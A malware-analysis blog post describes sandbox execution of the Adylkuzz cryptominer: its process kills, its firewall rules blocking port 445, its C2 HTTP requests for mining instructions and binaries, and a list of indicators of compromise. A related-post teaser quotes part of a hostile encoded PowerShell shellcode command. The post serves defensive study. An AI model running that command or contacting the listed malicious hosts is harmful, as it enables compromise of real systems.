Skip to main content

Behavioural analysis of Adylkuzz Cryptocurrency Mining Malware

Introduction
This post explains how to execute a malware specimen in a controlled environment (Sandbox) to identify indicators of compromise (IOC).  It doesn't cover initial infection vector, propagation and recovery of infected system

Adylkuzz CryptoMiner
Adylkuzz is described as a piece of malware that infects computers through the same means as WannaCry but, instead of locking files on computers, hides in the background and digitally makes money. It does not interfere with a user's files but remains behind the scenes. The "symptoms" of the attack include loss of access to shared resources on Windows plus computers and servers running slowly.Once running, Adylkuzz will first stop any potential instances of itself already running and block SMB communication to avoid further infection. It then determines the public IP address of the victim and download the mining instructions, cryptominer, and cleanup tools.

Disclaimer
  • You are dealing with real malware samples
  • Don’t expose them to internal networks or internet
  • Analyze them in a controlled environments (sandboxes)
  • We are not responsible for any consequences of damage if you fail to obey the rules
Binary Hash
MD5:  f2e1d236c5d2c009e1749fc6479a9ede

Tools  
  • Process hacker 
  • Process monitor 
  • Wireshark
  • CaptureBAT
  • Hashmyfiles 
  • Windows 7 VM
Analysis
A windows 7 virtual machine was set up with all tools. Let's run process hacker, process monitor, wireshark and captureBAT in the background and run the adylkuzz specimen with admin privileges as it generally gets admin privileges. A quick look at process hacker showed adylkuzz was launched by explorer

Adylkuzz launched many command prompts upon the execution and these could be seen in process hacker. As mentioned, the aim to is find out indicators of compromise so lets look at process monitor and wireshark further to check for process creation and network connections
 As shown in process hacker, some suspicious process were spotted and also getting terminated upon the execution via command prompt.  Let's have a quick look at the Process monitor procmon output, just filter the output with Operation is Process Create and spot the adylkuzz initial execution by explorer.exe and adylkuzz created various sub processes by invoking command line arguments
As shown, explorer process launched adylkuzz binary, later adylkuzz launched number of sub processes by invoking command line arguments through cmd.exe, the first thing it did was killing hdmanger.exe, mmc,exe and also stopped a service called WELM and deleted that later
It was also observed some new firewall rules added via command line arguments, the most interesting part was blocking 445(SMB) port from where the malware came through. Since this is a crypto mining  malware which exceptionally use all computer resources to  compute hard mathematical functions, it restricts and blocks port 445 (SMB) being exploited by any other malware so that all resources can be used by itself
As shown below, number of process were killed and more firewall rules were added. Most interestingly it had some filesystem activity by creating few files in TEMP folder and had access to Fonts directory (happens rarely). It was also observed that another process with a batch file and a pinging localhost.
Here is the captured process monitor file for further exploration
procmon file: https://mega.nz/#F!9nxBAKbZ!Uwu73mULkDty8xIG4h-FTg
MD5: e7d69cb1050b25c6ac08fbabfbba6ff4

Meanwhile,a quick look at wireshark with filter http.request.method==GET && not udp showed few interesting http requests with command instructions and file downloads
Follow TCP stream for GET request  /install/start HTTP/1.1,the infected host contacted server to convey it's presence and it got 200 OK
Follow the TCP stream for next GET request for /mine.txt, the infected host received 200 OK with a set of crypto mining instructions
Looking at the next GET request, the malware pulled a binary 64.exe from server and then sent a report with system information like system architecture, cpu frequency, the number of cpu calls and memory etc. This will let the malware authors know what type of system is infected and what type of resources can be used for various computational purpose.
It was observed that the previous  response contains a resource location with a lua script which was fetched in next GET request. It was also found that malware pulls a binary from server and requests for mine.txt to get the mining instructions
All HTTP objects were extracted in wireshark by File-->Export Objects -->HTTP 

Pcap:  https://mega.nz/#!tnQwjCTD!0Ej9db8JMbmB6GAmVMJpoFVYUuLVaV0KZCKlUO5RTS8
MD5: 34723c7c5c54d6ff22cad74c7921c937

It was evident that adylkuzz completely consumes all resources and also detects the presence of task manager taskmgr.exe so that it can show the normal system usage while taskmgr is running in the background 

As shown below, adylkuzz shows different system usage information while taskmgr.exe running in background

 Have a quick look at the captureBAT output, below are the created, modified and deleted files
adylkuzz created a log file for  crypto mining operations

Indicators of Compromise 
  • 08.super5566.com
  • aa1.super5566.com
  • 107.170.200.222
  • 1.32.192.16 
  • 07.lua
  • 445.bat
  • 445.exe
  • 86.exe
  • msiexev.exe
  •  mine.txt
  • s1f0.1_.exe
  • s1f0._Miner_.log
  • 5e97bc06c438d9c393e67591029ee1e4
  • 0711b1d7523f0e02be2505f2e0b39fae
  • 2d001c3d5e3509a7e7d4a72aa6e423ce
  • 4557e4533a41c8e36a347450f4b58a76
  • d8f508c5af84df89d73ae9c4173c1cdb
  • 4557e4533a41c8e36a347450f4b58a76
  • 2d001c3d5e3509a7e7d4a72aa6e423ce
  • 6343af71615d2f1c51f654863f6136f2
Disclaimer: These IPs may subject to change in future 


This is just an explanatory post to leverage basic dynamic malware analysis to find indicators of compromise

  






Comments

  1. This information is meaningful and magnificent which you have shared here about the Cryptocurrency Mining. I am impressed by the details that you have shared in this post and It reveals how nicely you understand this subject. I would like to thanks for sharing this article here. Crypto Loan Calculator Online

    ReplyDelete
  2. The trading sessions of Bitcoin will last as long as the user wants. So experts advise new users to identify the peak trading period in their countries and trade at that time.

    ReplyDelete
  3. I changed into amazingly curious about the article. It's moving I need to yield. I like visiting your site page on record that I by and large occur in the wake of refreshing articles like this one. How to sell bitcoin in Canada

    ReplyDelete

Post a Comment

Popular posts from this blog

Memory Analysis of WannaCry Ransomware

Introduction  This post explains the memory dump analysis of WannaCry infected system using volatility (An open source memory forensics framework) and other open source tools. It doesn't cover the analysis of initial infection vector, propagation and recovery of infected system. The objective is to leverage memory forensic analysis to uncover and extract Indicators of Compromise (IoC)  WannaCry  WannaCry (or WannaCrypt, WanaCrypt0r 2.0, Wanna Decryptor) is a ransomware program targeting the Microsoft Windows operating system. On Friday, 12 May 2017, a large cyber-attack using it was launched, infecting more than 230,000 computers in 150 countries, demanding ransom payments in the cryptocurrency bitcoin in 28 languages.The attack has been described by Europol as unprecedented in scale. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack Discalimer You are dealing with real malware samples Don’t expose them to internal networks or internet Analyze them in a controlle

Malicious office doc with process hollowing shellcode

Introduction  This post covers how to identify and extract shellcode manually from hancitor phishing office document. Refer  Part-1  and  Part-2  to get an understanding of  tools and approach to analyse phishing documents.  Tools  Didier Stevens Suite    sudo pip install oletools  Analysis   SHA256:  5d077b1341a6472f02aac89488976d4395a91ae4f23657b0344da74f4a560c8d   This sample contains encoded shellcode that starts a new (suspended) explorer.exe process, injects its own code (an embedded, encoded exe) and executes it.  This maldoc leverages  VBA macros  to execute its payload  and t he encoded shellcode is a property in stream 17.  T he shellcode uses WIN32 API functions like CreateProcess, ZwUnmapViewOfSection, GetThreadContext, ResumeThread etc. to inject code into the newly created process (explorer.exe) and execute it. This method is called process hollowing or process replacement.The explorer.exe process is created in a suspended state, the code for explore

Decoding Metasploit and CobaltStrike shells

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAH